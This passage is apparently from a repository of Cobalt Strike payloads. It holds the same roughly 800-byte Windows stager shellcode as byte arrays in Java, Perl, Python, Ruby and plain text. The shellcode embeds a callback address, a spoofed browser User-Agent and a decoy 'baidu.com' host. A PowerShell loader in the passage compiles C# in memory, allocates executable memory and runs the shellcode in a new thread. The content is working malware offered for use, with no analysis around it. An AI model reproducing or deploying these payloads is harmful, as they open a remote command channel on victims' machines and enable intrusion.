0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x35, 0x34, 0x2e, 0x31, 0x33, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00 }; ================================================ FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.java ================================================ /* length: 800 bytes */ byte buf[] = new byte[] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x24, 0x05, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 
0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x6a, 0x48, 0x75, 0x35, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x32, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x36, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 
0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x35, 0x34, 0x2e, 0x31, 0x33, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00 }; ================================================ FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.pl ================================================ # length: 800 bytes $buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x43\x77\x6d\x35\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2
e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00"; ================================================ FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.ps1 ================================================ Set-StrictMode -Version 2 $eicar = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' $DoIt = @' $assembly = @" using System; using System.Runtime.InteropServices; namespace inject { public class func { [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 } [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 } [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF } [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr 
CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds); } } "@ $compiler = New-Object Microsoft.CSharp.CSharpCodeProvider $params = New-Object System.CodeDom.Compiler.CompilerParameters $params.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location)) $params.GenerateInMemory = $True $result = $compiler.CompileAssemblyFromSource($params, $assembly) [Byte[]]$var_code = [System.Convert]::FromBase64String("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") $buffer = [inject.func]::VirtualAlloc(0, $var_code.Length + 1, [inject.func+AllocationType]::Reserve -bOr [inject.func+AllocationType]::Commit, [inject.func+MemoryProtection]::ExecuteReadWrite) if ([Bool]!$buffer) { $global:result = 3; return } [System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $buffer, $var_code.Length) [IntPtr] $thread = [inject.func]::CreateThread(0, 0, $buffer, 0, 0, 0) if ([Bool]!$thread) { $global:result = 7; return } $result2 = [inject.func]::WaitForSingleObject($thread, [inject.func+Time]::Infinite) '@ If ([IntPtr]::size -eq 8) { start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job } else { IEX $DoIt } ================================================ FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py ================================================ # length: 800 bytes buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x66\x77\x31\x4e\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2
e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00" ================================================ FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.rb ================================================ # length: 800 bytes buf = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x75\x43\x50\x54\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2
e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00" ================================================ FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.sct ================================================ ================================================ FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.txt ================================================ 
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x70\x44\